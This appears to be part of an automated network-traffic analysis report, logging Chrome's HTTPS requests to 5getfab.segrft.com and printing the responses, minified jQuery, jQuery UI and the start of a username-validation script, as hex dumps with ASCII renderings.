                                                      2025-01-12 23:47:45 UTC4096INData Raw: 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3d 61 2e 72 65 70 6c 61 63 65 28 63 61 2c 64 61 29 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 2e 74 65 78 74 43 6f 6e 74 65 6e 74 7c 7c 62 2e 69 6e 6e 65 72 54 65 78 74 7c 7c 65 28 62 29 29 2e 69 6e 64 65 78 4f 66 28 61 29 3e 2d 31 7d 7d 29 2c 6c 61 6e 67 3a 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 57 2e 74 65 73 74 28 61 7c 7c 22 22 29 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 6c 61 6e 67 3a 20 22 2b 61 29 2c 61 3d 61 2e 72 65 70 6c 61 63 65 28 63 61 2c 64 61 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3b 64 6f 20 69 66 28 63 3d 70 3f 62 2e 6c 61 6e 67 3a 62 2e 67 65 74 41 74 74 72
                                                      Data Ascii: ion(a){return a=a.replace(ca,da),function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:ia(function(a){return W.test(a||"")||ga.error("unsupported lang: "+a),a=a.replace(ca,da).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttr
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 5b 69 5d 2e 74 79 70 65 5d 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 5b 69 5d 2e 6d 61 74 63 68 65 73 29 2c 63 5b 75 5d 29 7b 66 6f 72 28 65 3d 2b 2b 69 3b 66 3e 65 3b 65 2b 2b 29 69 66 28 64 2e 72 65 6c 61 74 69 76 65 5b 61 5b 65 5d 2e 74 79 70 65 5d 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 77 61 28 69 3e 31 26 26 74 61 28 6d 29 2c 69 3e 31 26 26 72 61 28 61 2e 73 6c 69 63 65 28 30 2c 69 2d 31 29 2e 63 6f 6e 63 61 74 28 7b 76 61 6c 75 65 3a 22 20 22 3d 3d 3d 61 5b 69 2d 32 5d 2e 74 79 70 65 3f 22 2a 22 3a 22 22 7d 29 29 2e 72 65 70 6c 61 63 65 28 52 2c 22 24 31 22 29 2c 63 2c 65 3e 69 26 26 78 61 28 61 2e 73 6c 69 63 65 28 69 2c 65 29 29 2c 66 3e 65 26 26 78 61 28 61 3d 61 2e 73 6c 69 63 65 28 65 29 29 2c 66 3e 65 26 26 72 61 28 61 29 29 7d 6d 2e 70 75 73
                                                      Data Ascii: [i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return wa(i>1&&ta(m),i>1&&ra(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&xa(a.slice(i,e)),f>e&&xa(a=a.slice(e)),f>e&&ra(a))}m.pus
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 3a 74 68 69 73 2e 61 74 74 72 28 63 2c 62 5b 63 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 72 65 74 75 72 6e 20 64 3d 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 63 5b 32 5d 29 2c 64 26 26 64 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 74 68 69 73 2e 6c 65 6e 67 74 68 3d 31 2c 74 68 69 73 5b 30 5d 3d 64 29 2c 74 68 69 73 2e 63 6f 6e 74 65 78 74 3d 6c 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 3d 61 2c 74 68 69 73 7d 72 65 74 75 72 6e 20 61 2e 6e 6f 64 65 54 79 70 65 3f 28 74 68 69 73 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 5b 30 5d 3d 61 2c 74 68 69 73 2e 6c 65 6e 67 74 68 3d 31 2c 74 68 69 73 29 3a 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3f 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 79 2e 72 65 61 64 79 3f 79 2e 72 65 61 64 79
                                                      Data Ascii: :this.attr(c,b[c]);return this}return d=l.getElementById(c[2]),d&&d.parentNode&&(this.length=1,this[0]=d),this.context=l,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?"undefined"!=typeof y.ready?y.ready
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 67 26 26 67 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 61 26 26 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 2e 70 72 6f 6d 69 73 65 29 3f 61 2e 70 72 6f 6d 69 73 65 28 29 2e 64 6f 6e 65 28 63 2e 72 65 73 6f 6c 76 65 29 2e 66 61 69 6c 28 63 2e 72 65 6a 65 63 74 29 2e 70 72 6f 67 72 65 73 73 28 63 2e 6e 6f 74 69 66 79 29 3a 63 5b 66 5b 30 5d 2b 22 57 69 74 68 22 5d 28 74 68 69 73 3d 3d 3d 64 3f 63 2e 70 72 6f 6d 69 73 65 28 29 3a 74 68 69 73 2c 67 3f 5b 61 5d 3a 61 72 67 75 6d 65 6e 74 73 29 7d 29 7d 29 2c 61 3d 6e 75 6c 6c 7d 29 2e 70 72 6f 6d 69 73 65 28 29 7d 2c 70 72 6f 6d 69 73 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 3f 6e 2e 65 78
                                                      Data Ascii: (function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.ex
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 22 29 26 26 28 64 3d 6e 2e 63 61 6d 65 6c 43 61 73 65 28 64 2e 73 6c 69 63 65 28 35 29 29 2c 50 28 66 2c 64 2c 65 5b 64 5d 29 29 29 3b 4c 2e 73 65 74 28 66 2c 22 68 61 73 44 61 74 61 41 74 74 72 73 22 2c 21 30 29 7d 72 65 74 75 72 6e 20 65 7d 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4d 2e 73 65 74 28 74 68 69 73 2c 61 29 7d 29 3a 4a 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 2c 64 3d 6e 2e 63 61 6d 65 6c 43 61 73 65 28 61 29 3b 69 66 28 66 26 26 76 6f 69 64 20 30 3d 3d 3d 62 29 7b 69 66 28 63 3d 4d 2e 67 65 74 28 66 2c 61 29 2c 76 6f 69 64 20 30 21 3d 3d 63 29 72 65 74 75 72 6e 20 63 3b 69 66 28
                                                      Data Ascii: ndexOf("data-")&&(d=n.camelCase(d.slice(5)),P(f,d,e[d])));L.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){M.set(this,a)}):J(this,function(b){var c,d=n.camelCase(a);if(f&&void 0===b){if(c=M.get(f,a),void 0!==c)return c;if(
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 74 65 61 72 64 6f 77 6e 2e 63 61 6c 6c 28 61 2c 70 2c 72 2e 68 61 6e 64 6c 65 29 21 3d 3d 21 31 7c 7c 6e 2e 72 65 6d 6f 76 65 45 76 65 6e 74 28 61 2c 6f 2c 72 2e 68 61 6e 64 6c 65 29 2c 64 65 6c 65 74 65 20 69 5b 6f 5d 29 7d 65 6c 73 65 20 66 6f 72 28 6f 20 69 6e 20 69 29 6e 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 61 2c 6f 2b 62 5b 6a 5d 2c 63 2c 64 2c 21 30 29 3b 6e 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 69 29 26 26 28 64 65 6c 65 74 65 20 72 2e 68 61 6e 64 6c 65 2c 4c 2e 72 65 6d 6f 76 65 28 61 2c 22 65 76 65 6e 74 73 22 29 29 7d 7d 2c 74 72 69 67 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 2c 65 29 7b 76 61 72 20 66 2c 67 2c 68 2c 69 2c 6b 2c 6d 2c 6f 2c 70 3d 5b 64 7c 7c 6c 5d 2c 71 3d 6a 2e 63 61 6c 6c 28 62 2c 22 74 79 70 65 22 29
                                                      Data Ascii: teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete i[o])}else for(o in i)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(i)&&(delete r.handle,L.remove(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,m,o,p=[d||l],q=j.call(b,"type")


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.44977220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:46 UTC649OUTGET /plugins/jquery-ui/jquery-ui.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:46 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:46 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 253669
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-3dee5"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:46 UTC3776INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 32 2e 31 20 2d 20 32 30 31 36 2d 30 39 2d 31 34 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70 6c
                                                      Data Ascii: /*! jQuery UI - v1.12.1 - 2016-09-14* http://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-expl
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 74 68 69 73 2e 63 6c 61 73 73 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 22 29 26 26 74 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 2d 68 6f 76 65 72 22 29 2c 2d 31 21 3d 3d 74 68 69 73 2e 63 6c 61 73 73 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 22 29 26 26 74 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 2d 68 6f 76 65 72 22 29 7d 29 2e 6f 6e 28 22 6d 6f 75 73 65 6f 76 65 72 22 2c 69 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 74 2e 64 61 74 65 70 69 63 6b 65 72 2e 5f 69 73 44 69 73 61 62 6c 65 64 44 61 74
                                                      Data Ascii: this.className.indexOf("ui-datepicker-prev")&&t(this).removeClass("ui-datepicker-prev-hover"),-1!==this.className.indexOf("ui-datepicker-next")&&t(this).removeClass("ui-datepicker-next-hover")}).on("mouseover",i,o)}function o(){t.datepicker._isDisabledDat
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 63 72 65 61 74 65 22 2c 6e 75 6c 6c 2c 74 68 69 73 2e 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 28 29 29 2c 74 68 69 73 2e 5f 69 6e 69 74 28 29 7d 2c 5f 67 65 74 43 72 65 61 74 65 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 2c 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 3a 74 2e 6e 6f 6f 70 2c 5f 63 72 65 61 74 65 3a 74 2e 6e 6f 6f 70 2c 5f 69 6e 69 74 3a 74 2e 6e 6f 6f 70 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 28 29 2c 74 2e 65 61 63 68 28 74 68 69 73 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 65 2e 5f 72 65 6d 6f 76 65 43 6c 61 73
                                                      Data Ascii: create",null,this._getCreateEventData()),this._init()},_getCreateOptions:function(){return{}},_getCreateEventData:t.noop,_create:t.noop,_init:t.noop,destroy:function(){var e=this;this._destroy(),t.each(this.classesElementLookup,function(t,i){e._removeClas
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 61 72 20 6e 2c 6f 2c 61 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 65 5d 3b 69 66 28 73 3d 73 7c 7c 7b 7d 2c 69 3d 74 2e 45 76 65 6e 74 28 69 29 2c 69 2e 74 79 70 65 3d 28 65 3d 3d 3d 74 68 69 73 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 3f 65 3a 74 68 69 73 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 2b 65 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 69 2e 74 61 72 67 65 74 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 30 5d 2c 6f 3d 69 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 29 66 6f 72 28 6e 20 69 6e 20 6f 29 6e 20 69 6e 20 69 7c 7c 28 69 5b 6e 5d 3d 6f 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 69 2c 73 29 2c 21 28 74 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 26 26 61 2e 61
                                                      Data Ascii: ar n,o,a=this.options[e];if(s=s||{},i=t.Event(i),i.type=(e===this.widgetEventPrefix?e:this.widgetEventPrefix+e).toLowerCase(),i.target=this.element[0],o=i.originalEvent)for(n in o)n in i||(i[n]=o[n]);return this.element.trigger(i,s),!(t.isFunction(a)&&a.a
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 77 69 64 74 68 3a 6c 2c 68 65 69 67 68 74 3a 63 7d 2c 68 6f 72 69 7a 6f 6e 74 61 6c 3a 30 3e 69 3f 22 6c 65 66 74 22 3a 65 3e 30 3f 22 72 69 67 68 74 22 3a 22 63 65 6e 74 65 72 22 2c 76 65 72 74 69 63 61 6c 3a 30 3e 72 3f 22 74 6f 70 22 3a 73 3e 30 3f 22 62 6f 74 74 6f 6d 22 3a 22 6d 69 64 64 6c 65 22 7d 3b 6c 3e 70 26 26 70 3e 61 28 65 2b 69 29 26 26 28 75 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3d 22 63 65 6e 74 65 72 22 29 2c 63 3e 66 26 26 66 3e 61 28 73 2b 72 29 26 26 28 75 2e 76 65 72 74 69 63 61 6c 3d 22 6d 69 64 64 6c 65 22 29 2c 75 2e 69 6d 70 6f 72 74 61 6e 74 3d 6f 28 61 28 65 29 2c 61 28 69 29 29 3e 6f 28 61 28 73 29 2c 61 28 72 29 29 3f 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3a 22 76 65 72 74 69 63 61 6c 22 2c 6e 2e 75 73 69 6e 67 2e 63 61 6c 6c 28 74
                                                      Data Ascii: width:l,height:c},horizontal:0>i?"left":e>0?"right":"center",vertical:0>r?"top":s>0?"bottom":"middle"};l>p&&p>a(e+i)&&(u.horizontal="center"),c>f&&f>a(s+r)&&(u.vertical="middle"),u.important=o(a(e),a(i))>o(a(s),a(r))?"horizontal":"vertical",n.using.call(t
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 73 2a 2c 5c 73 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 25 5c 73 2a 2c 5c 73 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 25 5c 73 2a 28 3f 3a 2c 5c 73 2a 28 5c 64 3f 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 73 2a 29 3f 5c 29 2f 2c 73 70 61 63 65 3a 22 68 73 6c 61 22 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 74 5b 31 5d 2c 74 5b 32 5d 2f 31 30 30 2c 74 5b 33 5d 2f 31 30 30 2c 74 5b 34 5d 5d 7d 7d 5d 2c 6c 3d 74 2e 43 6f 6c 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 2e 43 6f 6c 6f 72 2e 66 6e 2e 70 61 72 73 65 28 65 2c 69 2c 73 2c 6e 29 7d 2c 63 3d 7b 72 67 62 61 3a 7b 70 72 6f 70 73 3a 7b 72 65 64 3a 7b
                                                      Data Ascii: *(\d+(?:\.\d+)?)\s*,\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,space:"hsla",parse:function(t){return[t[1],t[2]/100,t[3]/100,t[4]]}}],l=t.Color=function(e,i,s,n){return new t.Color.fn.parse(e,i,s,n)},c={rgba:{props:{red:{
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 6e 28 65 29 7b 76 61 72 20 69 3d 65 2e 73 70 6c 69 74 28 22 20 22 29 3b 66 28 69 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 74 2e 63 73 73 48 6f 6f 6b 73 5b 69 5d 3d 7b 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 6f 2c 61 2c 72 3d 22 22 3b 69 66 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 21 3d 3d 6e 26 26 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 2e 74 79 70 65 28 6e 29 7c 7c 28 6f 3d 73 28 6e 29 29 29 29 7b 69 66 28 6e 3d 6c 28 6f 7c 7c 6e 29 2c 21 64 2e 72 67 62 61 26 26 31 21 3d 3d 6e 2e 5f 72 67 62 61 5b 33 5d 29 7b 66 6f 72 28 61 3d 22 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3d 3d 3d 69 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 65 3b 28 22 22 3d 3d 3d 72 7c 7c 22 74 72 61 6e 73 70 61 72 65 6e 74 22 3d 3d 3d 72 29 26 26 61
                                                      Data Ascii: n(e){var i=e.split(" ");f(i,function(e,i){t.cssHooks[i]={set:function(e,n){var o,a,r="";if("transparent"!==n&&("string"!==t.type(n)||(o=s(n)))){if(n=l(o||n),!d.rgba&&1!==n._rgba[3]){for(a="backgroundColor"===i?e.parentNode:e;(""===r||"transparent"===r)&&a
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 6f 70 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 31 5d 29 7c 7c 30 2c 72 69 67 68 74 3a 22 61 75 74 6f 22 3d 3d 3d 6f 5b 32 5d 3f 69 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 32 5d 29 2c 62 6f 74 74 6f 6d 3a 22 61 75 74 6f 22 3d 3d 3d 6f 5b 33 5d 3f 73 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 33 5d 29 2c 6c 65 66 74 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 34 5d 29 7c 7c 30 7d 7d 74 2e 65 78 70 72 26 26 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 26 26 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 2e 61 6e 69 6d 61 74 65 64 26 26 28 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 2e 61 6e 69 6d 61 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 69 29 7b 72 65 74 75 72 6e 21 21 74 28 69 29 2e 64 61 74 61 28 64 29 7c 7c
                                                      Data Ascii: op:parseFloat(o[1])||0,right:"auto"===o[2]?i:parseFloat(o[2]),bottom:"auto"===o[3]?s:parseFloat(o[3]),left:parseFloat(o[4])||0}}t.expr&&t.expr.filters&&t.expr.filters.animated&&(t.expr.filters.animated=function(e){return function(i){return!!t(i).data(d)||
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 64 65 3f 28 72 5b 6c 5d 28 29 2c 61 28 29 29 3a 6e 2e 63 61 6c 6c 28 72 5b 30 5d 2c 73 2c 69 29 3a 28 72 2e 69 73 28 22 3a 68 69 64 64 65 6e 22 29 3f 22 68 69 64 65 22 3d 3d 3d 6c 3a 22 73 68 6f 77 22 3d 3d 3d 6c 29 3f 28 72 5b 6c 5d 28 29 2c 61 28 29 29 3a 6e 2e 63 61 6c 6c 28 72 5b 30 5d 2c 73 2c 61 29 7d 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 6e 3d 74 2e 65 66 66 65 63 74 73 2e 65 66 66 65 63 74 5b 73 2e 65 66 66 65 63 74 5d 2c 6f 3d 6e 2e 6d 6f 64 65 2c 61 3d 73 2e 71 75 65 75 65 2c 72 3d 61 7c 7c 22 66 78 22 2c 68 3d 73 2e 63 6f 6d 70 6c 65 74 65 2c 6c 3d 73 2e 6d 6f 64 65 2c 63 3d 5b 5d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2c 73 3d 74 2e 65 66 66 65 63
                                                      Data Ascii: de?(r[l](),a()):n.call(r[0],s,i):(r.is(":hidden")?"hide"===l:"show"===l)?(r[l](),a()):n.call(r[0],s,a)}var s=e.apply(this,arguments),n=t.effects.effect[s.effect],o=n.mode,a=s.queue,r=a||"fx",h=s.complete,l=s.mode,c=[],u=function(e){var i=t(this),s=t.effec
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 73 2c 6e 3d 7b 7d 2c 6f 3d 74 28 74 68 69 73 29 2c 61 3d 65 2e 64 69 72 65 63 74 69 6f 6e 7c 7c 22 76 65 72 74 69 63 61 6c 22 2c 72 3d 22 62 6f 74 68 22 3d 3d 3d 61 2c 68 3d 72 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 61 2c 6c 3d 72 7c 7c 22 76 65 72 74 69 63 61 6c 22 3d 3d 3d 61 3b 73 3d 6f 2e 63 73 73 43 6c 69 70 28 29 2c 6e 2e 63 6c 69 70 3d 7b 74 6f 70 3a 6c 3f 28 73 2e 62 6f 74 74 6f 6d 2d 73 2e 74 6f 70 29 2f 32 3a 73 2e 74 6f 70 2c 72 69 67 68 74 3a 68 3f 28 73 2e 72 69 67 68 74 2d 73 2e 6c 65 66 74 29 2f 32 3a 73 2e 72 69 67 68 74 2c 62 6f 74 74 6f 6d 3a 6c 3f 28 73 2e 62 6f 74 74 6f 6d 2d 73 2e 74 6f 70 29 2f 32 3a 73 2e 62 6f 74 74 6f 6d 2c 6c 65 66 74 3a 68 3f 28 73 2e 72 69 67 68 74 2d 73 2e 6c
                                                      Data Ascii: ion(e,i){var s,n={},o=t(this),a=e.direction||"vertical",r="both"===a,h=r||"horizontal"===a,l=r||"vertical"===a;s=o.cssClip(),n.clip={top:l?(s.bottom-s.top)/2:s.top,right:h?(s.right-s.left)/2:s.right,bottom:l?(s.bottom-s.top)/2:s.bottom,left:h?(s.right-s.l


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.44977420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:46 UTC643OUTGET /plus/js/custom/checkinput.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:46 UTC318INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:46 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 15380
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-3c14"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:46 UTC3778INData Raw: 76 61 72 20 62 20 3d 20 66 61 6c 73 65 3b 0d 0a 24 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 24 28 22 23 75 73 65 72 69 64 22 29 2e 62 6c 75 72 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 68 65 63 6b 55 73 65 4e 61 6d 65 28 24 28 74 68 69 73 29 29 3b 0d 0a 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 68 65 63 6b 55 73 65 4e 61 6d 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 6f 62 6a 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 75 73 65 72 6e 61 6d 65 20 3d 20 24 2e 74 72 69 6d 28 6f 62 6a 2e 76 61 6c 28 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 2f 5e 28 5b 30 2d 39 5d 28 3f 3d 5b 30 2d 39 5d 2a 3f 5b 61 2d 7a 41 2d 7a 5d 29 5c 77 7b 34 2c 31 32 7d 29 7c 28 5b 61 2d 7a 41 2d 5a 5d 28 3f 3d 5b
                                                      Data Ascii: var b = false;$(function() { $("#userid").blur(function() { checkUseName($(this)); }); var checkUseName = function(obj) { var username = $.trim(obj.val()); if (!/^([0-9](?=[0-9]*?[a-zA-z])\w{4,12})|([a-zA-Z](?=[
